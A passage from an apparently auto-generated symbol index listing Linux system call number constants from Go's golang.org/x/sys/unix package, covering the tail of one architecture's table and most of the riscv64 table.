SYS_KEYCTL = 271 constant SYS_WAITID (line 270) | SYS_WAITID = 272 constant SYS_IOPRIO_SET (line 271) | SYS_IOPRIO_SET = 273 constant SYS_IOPRIO_GET (line 272) | SYS_IOPRIO_GET = 274 constant SYS_INOTIFY_INIT (line 273) | SYS_INOTIFY_INIT = 275 constant SYS_INOTIFY_ADD_WATCH (line 274) | SYS_INOTIFY_ADD_WATCH = 276 constant SYS_INOTIFY_RM_WATCH (line 275) | SYS_INOTIFY_RM_WATCH = 277 constant SYS_SPU_RUN (line 276) | SYS_SPU_RUN = 278 constant SYS_SPU_CREATE (line 277) | SYS_SPU_CREATE = 279 constant SYS_PSELECT6 (line 278) | SYS_PSELECT6 = 280 constant SYS_PPOLL (line 279) | SYS_PPOLL = 281 constant SYS_UNSHARE (line 280) | SYS_UNSHARE = 282 constant SYS_SPLICE (line 281) | SYS_SPLICE = 283 constant SYS_TEE (line 282) | SYS_TEE = 284 constant SYS_VMSPLICE (line 283) | SYS_VMSPLICE = 285 constant SYS_OPENAT (line 284) | SYS_OPENAT = 286 constant SYS_MKDIRAT (line 285) | SYS_MKDIRAT = 287 constant SYS_MKNODAT (line 286) | SYS_MKNODAT = 288 constant SYS_FCHOWNAT (line 287) | SYS_FCHOWNAT = 289 constant SYS_FUTIMESAT (line 288) | SYS_FUTIMESAT = 290 constant SYS_NEWFSTATAT (line 289) | SYS_NEWFSTATAT = 291 constant SYS_UNLINKAT (line 290) | SYS_UNLINKAT = 292 constant SYS_RENAMEAT (line 291) | SYS_RENAMEAT = 293 constant SYS_LINKAT (line 292) | SYS_LINKAT = 294 constant SYS_SYMLINKAT (line 293) | SYS_SYMLINKAT = 295 constant SYS_READLINKAT (line 294) | SYS_READLINKAT = 296 constant SYS_FCHMODAT (line 295) | SYS_FCHMODAT = 297 constant SYS_FACCESSAT (line 296) | SYS_FACCESSAT = 298 constant SYS_GET_ROBUST_LIST (line 297) | SYS_GET_ROBUST_LIST = 299 constant SYS_SET_ROBUST_LIST (line 298) | SYS_SET_ROBUST_LIST = 300 constant SYS_MOVE_PAGES (line 299) | SYS_MOVE_PAGES = 301 constant SYS_GETCPU (line 300) | SYS_GETCPU = 302 constant SYS_EPOLL_PWAIT (line 301) | SYS_EPOLL_PWAIT = 303 constant SYS_UTIMENSAT (line 302) | SYS_UTIMENSAT = 304 constant SYS_SIGNALFD (line 303) | SYS_SIGNALFD = 305 constant SYS_TIMERFD_CREATE (line 304) | SYS_TIMERFD_CREATE = 306 constant SYS_EVENTFD (line 305) | SYS_EVENTFD = 307 constant SYS_SYNC_FILE_RANGE2 (line 306) | SYS_SYNC_FILE_RANGE2 = 308 constant SYS_FALLOCATE (line 307) | SYS_FALLOCATE = 309 constant SYS_SUBPAGE_PROT (line 308) | SYS_SUBPAGE_PROT = 310 constant SYS_TIMERFD_SETTIME (line 309) | SYS_TIMERFD_SETTIME = 311 constant SYS_TIMERFD_GETTIME (line 310) | SYS_TIMERFD_GETTIME = 312 constant SYS_SIGNALFD4 (line 311) | SYS_SIGNALFD4 = 313 constant SYS_EVENTFD2 (line 312) | SYS_EVENTFD2 = 314 constant SYS_EPOLL_CREATE1 (line 313) | SYS_EPOLL_CREATE1 = 315 constant SYS_DUP3 (line 314) | SYS_DUP3 = 316 constant SYS_PIPE2 (line 315) | SYS_PIPE2 = 317 constant SYS_INOTIFY_INIT1 (line 316) | SYS_INOTIFY_INIT1 = 318 constant SYS_PERF_EVENT_OPEN (line 317) | SYS_PERF_EVENT_OPEN = 319 constant SYS_PREADV (line 318) | SYS_PREADV = 320 constant SYS_PWRITEV (line 319) | SYS_PWRITEV = 321 constant SYS_RT_TGSIGQUEUEINFO (line 320) | SYS_RT_TGSIGQUEUEINFO = 322 constant SYS_FANOTIFY_INIT (line 321) | SYS_FANOTIFY_INIT = 323 constant SYS_FANOTIFY_MARK (line 322) | SYS_FANOTIFY_MARK = 324 constant SYS_PRLIMIT64 (line 323) | SYS_PRLIMIT64 = 325 constant SYS_SOCKET (line 324) | SYS_SOCKET = 326 constant SYS_BIND (line 325) | SYS_BIND = 327 constant SYS_CONNECT (line 326) | SYS_CONNECT = 328 constant SYS_LISTEN (line 327) | SYS_LISTEN = 329 constant SYS_ACCEPT (line 328) | SYS_ACCEPT = 330 constant SYS_GETSOCKNAME (line 329) | SYS_GETSOCKNAME = 331 constant SYS_GETPEERNAME (line 330) | SYS_GETPEERNAME = 332 constant SYS_SOCKETPAIR (line 331) | SYS_SOCKETPAIR = 333 constant SYS_SEND (line 332) | SYS_SEND = 334 constant SYS_SENDTO (line 333) | SYS_SENDTO = 335 constant SYS_RECV (line 334) | SYS_RECV = 336 constant SYS_RECVFROM (line 335) | SYS_RECVFROM = 337 constant SYS_SHUTDOWN (line 336) | SYS_SHUTDOWN = 338 constant SYS_SETSOCKOPT (line 337) | SYS_SETSOCKOPT = 339 constant SYS_GETSOCKOPT (line 338) | SYS_GETSOCKOPT = 340 constant SYS_SENDMSG (line 339) | SYS_SENDMSG = 341 constant SYS_RECVMSG (line 340) | SYS_RECVMSG = 342 constant SYS_RECVMMSG (line 341) | SYS_RECVMMSG = 343 constant SYS_ACCEPT4 (line 342) | SYS_ACCEPT4 = 344 constant SYS_NAME_TO_HANDLE_AT (line 343) | SYS_NAME_TO_HANDLE_AT = 345 constant SYS_OPEN_BY_HANDLE_AT (line 344) | SYS_OPEN_BY_HANDLE_AT = 346 constant SYS_CLOCK_ADJTIME (line 345) | SYS_CLOCK_ADJTIME = 347 constant SYS_SYNCFS (line 346) | SYS_SYNCFS = 348 constant SYS_SENDMMSG (line 347) | SYS_SENDMMSG = 349 constant SYS_SETNS (line 348) | SYS_SETNS = 350 constant SYS_PROCESS_VM_READV (line 349) | SYS_PROCESS_VM_READV = 351 constant SYS_PROCESS_VM_WRITEV (line 350) | SYS_PROCESS_VM_WRITEV = 352 constant SYS_FINIT_MODULE (line 351) | SYS_FINIT_MODULE = 353 constant SYS_KCMP (line 352) | SYS_KCMP = 354 constant SYS_SCHED_SETATTR (line 353) | SYS_SCHED_SETATTR = 355 constant SYS_SCHED_GETATTR (line 354) | SYS_SCHED_GETATTR = 356 constant SYS_RENAMEAT2 (line 355) | SYS_RENAMEAT2 = 357 constant SYS_SECCOMP (line 356) | SYS_SECCOMP = 358 constant SYS_GETRANDOM (line 357) | SYS_GETRANDOM = 359 constant SYS_MEMFD_CREATE (line 358) | SYS_MEMFD_CREATE = 360 constant SYS_BPF (line 359) | SYS_BPF = 361 constant SYS_EXECVEAT (line 360) | SYS_EXECVEAT = 362 constant SYS_SWITCH_ENDIAN (line 361) | SYS_SWITCH_ENDIAN = 363 constant SYS_USERFAULTFD (line 362) | SYS_USERFAULTFD = 364 constant SYS_MEMBARRIER (line 363) | SYS_MEMBARRIER = 365 constant SYS_MLOCK2 (line 364) | SYS_MLOCK2 = 378 constant SYS_COPY_FILE_RANGE (line 365) | SYS_COPY_FILE_RANGE = 379 constant SYS_PREADV2 (line 366) | SYS_PREADV2 = 380 constant SYS_PWRITEV2 (line 367) | SYS_PWRITEV2 = 381 constant SYS_KEXEC_FILE_LOAD (line 368) | SYS_KEXEC_FILE_LOAD = 382 constant SYS_STATX (line 369) | SYS_STATX = 383 constant SYS_PKEY_ALLOC (line 370) | SYS_PKEY_ALLOC = 384 constant SYS_PKEY_FREE (line 371) | SYS_PKEY_FREE = 385 constant SYS_PKEY_MPROTECT (line 372) | SYS_PKEY_MPROTECT = 386 constant SYS_RSEQ (line 373) | SYS_RSEQ = 387 constant SYS_IO_PGETEVENTS (line 374) | SYS_IO_PGETEVENTS = 388 constant SYS_SEMTIMEDOP (line 375) | SYS_SEMTIMEDOP = 392 constant SYS_SEMGET (line 376) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 377) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 378) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 379) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 380) | SYS_SHMAT = 397 constant SYS_SHMDT (line 381) | SYS_SHMDT = 398 constant SYS_MSGGET (line 382) | SYS_MSGGET = 399 constant SYS_MSGSND (line 383) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 384) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 385) | SYS_MSGCTL = 402 constant SYS_PIDFD_SEND_SIGNAL (line 386) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 387) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 388) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 389) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 390) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 391) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 392) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 393) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 394) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 395) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 396) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 397) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 398) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 399) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 400) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 401) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 402) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 403) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 404) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 405) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 406) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 407) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 408) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 409) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 410) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 411) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 412) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 413) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 414) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 415) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 416) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 417) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_riscv64.go constant SYS_IO_SETUP (line 9) | SYS_IO_SETUP = 0 constant SYS_IO_DESTROY (line 10) | SYS_IO_DESTROY = 1 constant SYS_IO_SUBMIT (line 11) | SYS_IO_SUBMIT = 2 constant SYS_IO_CANCEL (line 12) | SYS_IO_CANCEL = 3 constant SYS_IO_GETEVENTS (line 13) | SYS_IO_GETEVENTS = 4 constant SYS_SETXATTR (line 14) | SYS_SETXATTR = 5 constant SYS_LSETXATTR (line 15) | SYS_LSETXATTR = 6 constant SYS_FSETXATTR (line 16) | SYS_FSETXATTR = 7 constant SYS_GETXATTR (line 17) | SYS_GETXATTR = 8 constant SYS_LGETXATTR (line 18) | SYS_LGETXATTR = 9 constant SYS_FGETXATTR (line 19) | SYS_FGETXATTR = 10 constant SYS_LISTXATTR (line 20) | SYS_LISTXATTR = 11 constant SYS_LLISTXATTR (line 21) | SYS_LLISTXATTR = 12 constant SYS_FLISTXATTR (line 22) | SYS_FLISTXATTR = 13 constant SYS_REMOVEXATTR (line 23) | SYS_REMOVEXATTR = 14 constant SYS_LREMOVEXATTR (line 24) | SYS_LREMOVEXATTR = 15 constant SYS_FREMOVEXATTR (line 25) | SYS_FREMOVEXATTR = 16 constant SYS_GETCWD (line 26) | SYS_GETCWD = 17 constant SYS_LOOKUP_DCOOKIE (line 27) | SYS_LOOKUP_DCOOKIE = 18 constant SYS_EVENTFD2 (line 28) | SYS_EVENTFD2 = 19 constant SYS_EPOLL_CREATE1 (line 29) | SYS_EPOLL_CREATE1 = 20 constant SYS_EPOLL_CTL (line 30) | SYS_EPOLL_CTL = 21 constant SYS_EPOLL_PWAIT (line 31) | SYS_EPOLL_PWAIT = 22 constant SYS_DUP (line 32) | SYS_DUP = 23 constant SYS_DUP3 (line 33) | SYS_DUP3 = 24 constant SYS_FCNTL (line 34) | SYS_FCNTL = 25 constant SYS_INOTIFY_INIT1 (line 35) | SYS_INOTIFY_INIT1 = 26 constant SYS_INOTIFY_ADD_WATCH (line 36) | SYS_INOTIFY_ADD_WATCH = 27 constant SYS_INOTIFY_RM_WATCH (line 37) | SYS_INOTIFY_RM_WATCH = 28 constant SYS_IOCTL (line 38) | SYS_IOCTL = 29 constant SYS_IOPRIO_SET (line 39) | SYS_IOPRIO_SET = 30 constant SYS_IOPRIO_GET (line 40) | SYS_IOPRIO_GET = 31 constant SYS_FLOCK (line 41) | SYS_FLOCK = 32 constant SYS_MKNODAT (line 42) | SYS_MKNODAT = 33 constant SYS_MKDIRAT (line 43) | SYS_MKDIRAT = 34 constant SYS_UNLINKAT (line 44) | SYS_UNLINKAT = 35 constant SYS_SYMLINKAT (line 45) | SYS_SYMLINKAT = 36 constant SYS_LINKAT (line 46) | SYS_LINKAT = 37 constant SYS_UMOUNT2 (line 47) | SYS_UMOUNT2 = 39 constant SYS_MOUNT (line 48) | SYS_MOUNT = 40 constant SYS_PIVOT_ROOT (line 49) | SYS_PIVOT_ROOT = 41 constant SYS_NFSSERVCTL (line 50) | SYS_NFSSERVCTL = 42 constant SYS_STATFS (line 51) | SYS_STATFS = 43 constant SYS_FSTATFS (line 52) | SYS_FSTATFS = 44 constant SYS_TRUNCATE (line 53) | SYS_TRUNCATE = 45 constant SYS_FTRUNCATE (line 54) | SYS_FTRUNCATE = 46 constant SYS_FALLOCATE (line 55) | SYS_FALLOCATE = 47 constant SYS_FACCESSAT (line 56) | SYS_FACCESSAT = 48 constant SYS_CHDIR (line 57) | SYS_CHDIR = 49 constant SYS_FCHDIR (line 58) | SYS_FCHDIR = 50 constant SYS_CHROOT (line 59) | SYS_CHROOT = 51 constant SYS_FCHMOD (line 60) | SYS_FCHMOD = 52 constant SYS_FCHMODAT (line 61) | SYS_FCHMODAT = 53 constant SYS_FCHOWNAT (line 62) | SYS_FCHOWNAT = 54 constant SYS_FCHOWN (line 63) | SYS_FCHOWN = 55 constant SYS_OPENAT (line 64) | SYS_OPENAT = 56 constant SYS_CLOSE (line 65) | SYS_CLOSE = 57 constant SYS_VHANGUP (line 66) | SYS_VHANGUP = 58 constant SYS_PIPE2 (line 67) | SYS_PIPE2 = 59 constant SYS_QUOTACTL (line 68) | SYS_QUOTACTL = 60 constant SYS_GETDENTS64 (line 69) | SYS_GETDENTS64 = 61 constant SYS_LSEEK (line 70) | SYS_LSEEK = 62 constant SYS_READ (line 71) | SYS_READ = 63 constant SYS_WRITE (line 72) | SYS_WRITE = 64 constant SYS_READV (line 73) | SYS_READV = 65 constant SYS_WRITEV (line 74) | SYS_WRITEV = 66 constant SYS_PREAD64 (line 75) | SYS_PREAD64 = 67 constant SYS_PWRITE64 (line 76) | SYS_PWRITE64 = 68 constant SYS_PREADV (line 77) | SYS_PREADV = 69 constant SYS_PWRITEV (line 78) | SYS_PWRITEV = 70 constant SYS_SENDFILE (line 79) | SYS_SENDFILE = 71 constant SYS_PSELECT6 (line 80) | SYS_PSELECT6 = 72 constant SYS_PPOLL (line 81) | SYS_PPOLL = 73 constant SYS_SIGNALFD4 (line 82) | SYS_SIGNALFD4 = 74 constant SYS_VMSPLICE (line 83) | SYS_VMSPLICE = 75 constant SYS_SPLICE (line 84) | SYS_SPLICE = 76 constant SYS_TEE (line 85) | SYS_TEE = 77 constant SYS_READLINKAT (line 86) | SYS_READLINKAT = 78 constant SYS_FSTATAT (line 87) | SYS_FSTATAT = 79 constant SYS_FSTAT (line 88) | SYS_FSTAT = 80 constant SYS_SYNC (line 89) | SYS_SYNC = 81 constant SYS_FSYNC (line 90) | SYS_FSYNC = 82 constant SYS_FDATASYNC (line 91) | SYS_FDATASYNC = 83 constant SYS_SYNC_FILE_RANGE (line 92) | SYS_SYNC_FILE_RANGE = 84 constant SYS_TIMERFD_CREATE (line 93) | SYS_TIMERFD_CREATE = 85 constant SYS_TIMERFD_SETTIME (line 94) | SYS_TIMERFD_SETTIME = 86 constant SYS_TIMERFD_GETTIME (line 95) | SYS_TIMERFD_GETTIME = 87 constant SYS_UTIMENSAT (line 96) | SYS_UTIMENSAT = 88 constant SYS_ACCT (line 97) | SYS_ACCT = 89 constant SYS_CAPGET (line 98) | SYS_CAPGET = 90 constant SYS_CAPSET (line 99) | SYS_CAPSET = 91 constant SYS_PERSONALITY (line 100) | SYS_PERSONALITY = 92 constant SYS_EXIT (line 101) | SYS_EXIT = 93 constant SYS_EXIT_GROUP (line 102) | SYS_EXIT_GROUP = 94 constant SYS_WAITID (line 103) | SYS_WAITID = 95 constant SYS_SET_TID_ADDRESS (line 104) | SYS_SET_TID_ADDRESS = 96 constant SYS_UNSHARE (line 105) | SYS_UNSHARE = 97 constant SYS_FUTEX (line 106) | SYS_FUTEX = 98 constant SYS_SET_ROBUST_LIST (line 107) | SYS_SET_ROBUST_LIST = 99 constant SYS_GET_ROBUST_LIST (line 108) | SYS_GET_ROBUST_LIST = 100 constant SYS_NANOSLEEP (line 109) | SYS_NANOSLEEP = 101 constant SYS_GETITIMER (line 110) | SYS_GETITIMER = 102 constant SYS_SETITIMER (line 111) | SYS_SETITIMER = 103 constant SYS_KEXEC_LOAD (line 112) | SYS_KEXEC_LOAD = 104 constant SYS_INIT_MODULE (line 113) | SYS_INIT_MODULE = 105 constant SYS_DELETE_MODULE (line 114) | SYS_DELETE_MODULE = 106 constant SYS_TIMER_CREATE (line 115) | SYS_TIMER_CREATE = 107 constant SYS_TIMER_GETTIME (line 116) | SYS_TIMER_GETTIME = 108 constant SYS_TIMER_GETOVERRUN (line 117) | SYS_TIMER_GETOVERRUN = 109 constant SYS_TIMER_SETTIME (line 118) | SYS_TIMER_SETTIME = 110 constant SYS_TIMER_DELETE (line 119) | SYS_TIMER_DELETE = 111 constant SYS_CLOCK_SETTIME (line 120) | SYS_CLOCK_SETTIME = 112 constant SYS_CLOCK_GETTIME (line 121) | SYS_CLOCK_GETTIME = 113 constant SYS_CLOCK_GETRES (line 122) | SYS_CLOCK_GETRES = 114 constant SYS_CLOCK_NANOSLEEP (line 123) | SYS_CLOCK_NANOSLEEP = 115 constant SYS_SYSLOG (line 124) | SYS_SYSLOG = 116 constant SYS_PTRACE (line 125) | SYS_PTRACE = 117 constant SYS_SCHED_SETPARAM (line 126) | SYS_SCHED_SETPARAM = 118 constant SYS_SCHED_SETSCHEDULER (line 127) | SYS_SCHED_SETSCHEDULER = 119 constant SYS_SCHED_GETSCHEDULER (line 128) | SYS_SCHED_GETSCHEDULER = 120 constant SYS_SCHED_GETPARAM (line 129) | SYS_SCHED_GETPARAM = 121 constant SYS_SCHED_SETAFFINITY (line 130) | SYS_SCHED_SETAFFINITY = 122 constant SYS_SCHED_GETAFFINITY (line 131) | SYS_SCHED_GETAFFINITY = 123 constant SYS_SCHED_YIELD (line 132) | SYS_SCHED_YIELD = 124 constant SYS_SCHED_GET_PRIORITY_MAX (line 133) | SYS_SCHED_GET_PRIORITY_MAX = 125 constant SYS_SCHED_GET_PRIORITY_MIN (line 134) | SYS_SCHED_GET_PRIORITY_MIN = 126 constant SYS_SCHED_RR_GET_INTERVAL (line 135) | SYS_SCHED_RR_GET_INTERVAL = 127 constant SYS_RESTART_SYSCALL (line 136) | SYS_RESTART_SYSCALL = 128 constant SYS_KILL (line 137) | SYS_KILL = 129 constant SYS_TKILL (line 138) | SYS_TKILL = 130 constant SYS_TGKILL (line 139) | SYS_TGKILL = 131 constant SYS_SIGALTSTACK (line 140) | SYS_SIGALTSTACK = 132 constant SYS_RT_SIGSUSPEND (line 141) | SYS_RT_SIGSUSPEND = 133 constant SYS_RT_SIGACTION (line 142) | SYS_RT_SIGACTION = 134 constant SYS_RT_SIGPROCMASK (line 143) | SYS_RT_SIGPROCMASK = 135 constant SYS_RT_SIGPENDING (line 144) | SYS_RT_SIGPENDING = 136 constant SYS_RT_SIGTIMEDWAIT (line 145) | SYS_RT_SIGTIMEDWAIT = 137 constant SYS_RT_SIGQUEUEINFO (line 146) | SYS_RT_SIGQUEUEINFO = 138 constant SYS_RT_SIGRETURN (line 147) | SYS_RT_SIGRETURN = 139 constant SYS_SETPRIORITY (line 148) | SYS_SETPRIORITY = 140 constant SYS_GETPRIORITY (line 149) | SYS_GETPRIORITY = 141 constant SYS_REBOOT (line 150) | SYS_REBOOT = 142 constant SYS_SETREGID (line 151) | SYS_SETREGID = 143 constant SYS_SETGID (line 152) | SYS_SETGID = 144 constant SYS_SETREUID (line 153) | SYS_SETREUID = 145 constant SYS_SETUID (line 154) | SYS_SETUID = 146 constant SYS_SETRESUID (line 155) | SYS_SETRESUID = 147 constant SYS_GETRESUID (line 156) | SYS_GETRESUID = 148 constant SYS_SETRESGID (line 157) | SYS_SETRESGID = 149 constant SYS_GETRESGID (line 158) | SYS_GETRESGID = 150 constant SYS_SETFSUID (line 159) | SYS_SETFSUID = 151 constant SYS_SETFSGID (line 160) | SYS_SETFSGID = 152 constant SYS_TIMES (line 161) | SYS_TIMES = 153 constant SYS_SETPGID (line 162) | SYS_SETPGID = 154 constant SYS_GETPGID (line 163) | SYS_GETPGID = 155 constant SYS_GETSID (line 164) | SYS_GETSID = 156 constant SYS_SETSID (line 165) | SYS_SETSID = 157 constant SYS_GETGROUPS (line 166) | SYS_GETGROUPS = 158 constant SYS_SETGROUPS (line 167) | SYS_SETGROUPS = 159 constant SYS_UNAME (line 168) | SYS_UNAME = 160 constant SYS_SETHOSTNAME (line 169) | SYS_SETHOSTNAME = 161 constant SYS_SETDOMAINNAME (line 170) | SYS_SETDOMAINNAME = 162 constant SYS_GETRLIMIT (line 171) | SYS_GETRLIMIT = 163 constant SYS_SETRLIMIT (line 172) | SYS_SETRLIMIT = 164 constant SYS_GETRUSAGE (line 173) | SYS_GETRUSAGE = 165 constant SYS_UMASK (line 174) | SYS_UMASK = 166 constant SYS_PRCTL (line 175) | SYS_PRCTL = 167 constant SYS_GETCPU (line 176) | SYS_GETCPU = 168 constant SYS_GETTIMEOFDAY (line 177) | SYS_GETTIMEOFDAY = 169 constant SYS_SETTIMEOFDAY (line 178) | SYS_SETTIMEOFDAY = 170 constant SYS_ADJTIMEX (line 179) | SYS_ADJTIMEX = 171 constant SYS_GETPID (line 180) | SYS_GETPID = 172 constant SYS_GETPPID (line 181) | SYS_GETPPID = 173 constant SYS_GETUID (line 182) | SYS_GETUID = 174 constant SYS_GETEUID (line 183) | SYS_GETEUID = 175 constant SYS_GETGID (line 184) | SYS_GETGID = 176 constant SYS_GETEGID (line 185) | SYS_GETEGID = 177 constant SYS_GETTID (line 186) | SYS_GETTID = 178 constant SYS_SYSINFO (line 187) | SYS_SYSINFO = 179 constant SYS_MQ_OPEN (line 188) | SYS_MQ_OPEN = 180 constant SYS_MQ_UNLINK (line 189) | SYS_MQ_UNLINK = 181 constant SYS_MQ_TIMEDSEND (line 190) | SYS_MQ_TIMEDSEND = 182 constant SYS_MQ_TIMEDRECEIVE (line 191) | SYS_MQ_TIMEDRECEIVE = 183 constant SYS_MQ_NOTIFY (line 192) | SYS_MQ_NOTIFY = 184 constant SYS_MQ_GETSETATTR (line 193) | SYS_MQ_GETSETATTR = 185 constant SYS_MSGGET (line 194) | SYS_MSGGET = 186 constant SYS_MSGCTL (line 195) | SYS_MSGCTL = 187 constant SYS_MSGRCV (line 196) | SYS_MSGRCV = 188 constant SYS_MSGSND (line 197) | SYS_MSGSND = 189 constant SYS_SEMGET (line 198) | SYS_SEMGET = 190 constant SYS_SEMCTL (line 199) | SYS_SEMCTL = 191 constant SYS_SEMTIMEDOP (line 200) | SYS_SEMTIMEDOP = 192 constant SYS_SEMOP (line 201) | SYS_SEMOP = 193 constant SYS_SHMGET (line 202) | SYS_SHMGET = 194 constant SYS_SHMCTL (line 203) | SYS_SHMCTL = 195 constant SYS_SHMAT (line 204) | SYS_SHMAT = 196 constant SYS_SHMDT (line 205) | SYS_SHMDT = 197 constant SYS_SOCKET (line 206) | SYS_SOCKET = 198 constant SYS_SOCKETPAIR (line 207) | SYS_SOCKETPAIR = 199 constant SYS_BIND (line 208) | SYS_BIND = 200 constant SYS_LISTEN (line 209) | SYS_LISTEN = 201 constant SYS_ACCEPT (line 210) | SYS_ACCEPT = 202 constant SYS_CONNECT (line 211) | SYS_CONNECT = 203 constant SYS_GETSOCKNAME (line 212) | SYS_GETSOCKNAME = 204 constant SYS_GETPEERNAME (line 213) | SYS_GETPEERNAME = 205 constant SYS_SENDTO (line 214) | SYS_SENDTO = 206 constant SYS_RECVFROM (line 215) | SYS_RECVFROM = 207 constant SYS_SETSOCKOPT (line 216) | SYS_SETSOCKOPT = 208 constant SYS_GETSOCKOPT (line 217) | SYS_GETSOCKOPT = 209 constant SYS_SHUTDOWN (line 218) | SYS_SHUTDOWN = 210 constant SYS_SENDMSG (line 219) | SYS_SENDMSG = 211 constant SYS_RECVMSG (line 220) | SYS_RECVMSG = 212 constant SYS_READAHEAD (line 221) | SYS_READAHEAD = 213 constant SYS_BRK (line 222) | SYS_BRK = 214 constant SYS_MUNMAP (line 223) | SYS_MUNMAP = 215 constant SYS_MREMAP (line 224) | SYS_MREMAP = 216 constant SYS_ADD_KEY (line 225) | SYS_ADD_KEY = 217 constant SYS_REQUEST_KEY (line 226) | SYS_REQUEST_KEY = 218 constant SYS_KEYCTL (line 227) | SYS_KEYCTL = 219 constant SYS_CLONE (line 228) | SYS_CLONE = 220 constant SYS_EXECVE (line 229) | SYS_EXECVE = 221 constant SYS_MMAP (line 230) | SYS_MMAP = 222 constant SYS_FADVISE64 (line 231) | SYS_FADVISE64 = 223 constant SYS_SWAPON (line 232) | SYS_SWAPON = 224 constant SYS_SWAPOFF (line 233) | SYS_SWAPOFF = 225 constant SYS_MPROTECT (line 234) | SYS_MPROTECT = 226 constant SYS_MSYNC (line 235) | SYS_MSYNC = 227 constant SYS_MLOCK (line 236) | SYS_MLOCK = 228 constant SYS_MUNLOCK (line 237) | SYS_MUNLOCK = 229 constant SYS_MLOCKALL (line 238) | SYS_MLOCKALL = 230 constant SYS_MUNLOCKALL (line 239) | SYS_MUNLOCKALL = 231 constant SYS_MINCORE (line 240) | SYS_MINCORE = 232 constant SYS_MADVISE (line 241) | SYS_MADVISE = 233 constant SYS_REMAP_FILE_PAGES (line 242) | SYS_REMAP_FILE_PAGES = 234 constant SYS_MBIND (line 243) | SYS_MBIND = 235 constant SYS_GET_MEMPOLICY (line 244) | SYS_GET_MEMPOLICY = 236 constant SYS_SET_MEMPOLICY (line 245) | SYS_SET_MEMPOLICY = 237 constant SYS_MIGRATE_PAGES (line 246) | SYS_MIGRATE_PAGES = 238 constant SYS_MOVE_PAGES (line 247) | SYS_MOVE_PAGES = 239 constant SYS_RT_TGSIGQUEUEINFO (line 248) | SYS_RT_TGSIGQUEUEINFO = 240 constant SYS_PERF_EVENT_OPEN (line 249) | SYS_PERF_EVENT_OPEN = 241 constant SYS_ACCEPT4 (line 250) | SYS_ACCEPT4 = 242 constant SYS_RECVMMSG (line 251) | SYS_RECVMMSG = 243 constant SYS_ARCH_SPECIFIC_SYSCALL (line 252) | SYS_ARCH_SPECIFIC_SYSCALL = 244 constant SYS_RISCV_HWPROBE (line 253) | SYS_RISCV_HWPROBE = 258 constant SYS_RISCV_FLUSH_ICACHE (line 254) | SYS_RISCV_FLUSH_ICACHE = 259 constant SYS_WAIT4 (line 255) | SYS_WAIT4 = 260 constant SYS_PRLIMIT64 (line 256) | SYS_PRLIMIT64 = 261 constant SYS_FANOTIFY_INIT (line 257) | SYS_FANOTIFY_INIT = 262 constant SYS_FANOTIFY_MARK (line 258) | SYS_FANOTIFY_MARK = 263 constant SYS_NAME_TO_HANDLE_AT (line 259) | SYS_NAME_TO_HANDLE_AT = 264 constant SYS_OPEN_BY_HANDLE_AT (line 260) | SYS_OPEN_BY_HANDLE_AT = 265 constant SYS_CLOCK_ADJTIME (line 261) | SYS_CLOCK_ADJTIME = 266 constant SYS_SYNCFS (line 262) | SYS_SYNCFS = 267 constant SYS_SETNS (line 263) | SYS_SETNS = 268 constant SYS_SENDMMSG (line 264) | SYS_SENDMMSG = 269 constant SYS_PROCESS_VM_READV (line 265) | SYS_PROCESS_VM_READV = 270 constant SYS_PROCESS_VM_WRITEV (line 266) | SYS_PROCESS_VM_WRITEV = 271 constant SYS_KCMP (line 267) | SYS_KCMP = 272 constant SYS_FINIT_MODULE (line 268) | SYS_FINIT_MODULE = 273 constant SYS_SCHED_SETATTR (line 269) | SYS_SCHED_SETATTR = 274 constant SYS_SCHED_GETATTR (line 270) | SYS_SCHED_GETATTR = 275 constant SYS_RENAMEAT2 (line 271) | SYS_RENAMEAT2 = 276 constant SYS_SECCOMP (line 272) | SYS_SECCOMP = 277 constant SYS_GETRANDOM (line 273) | SYS_GETRANDOM = 278 constant SYS_MEMFD_CREATE (line 274) | SYS_MEMFD_CREATE = 279 constant SYS_BPF (line 275) | SYS_BPF = 280 constant 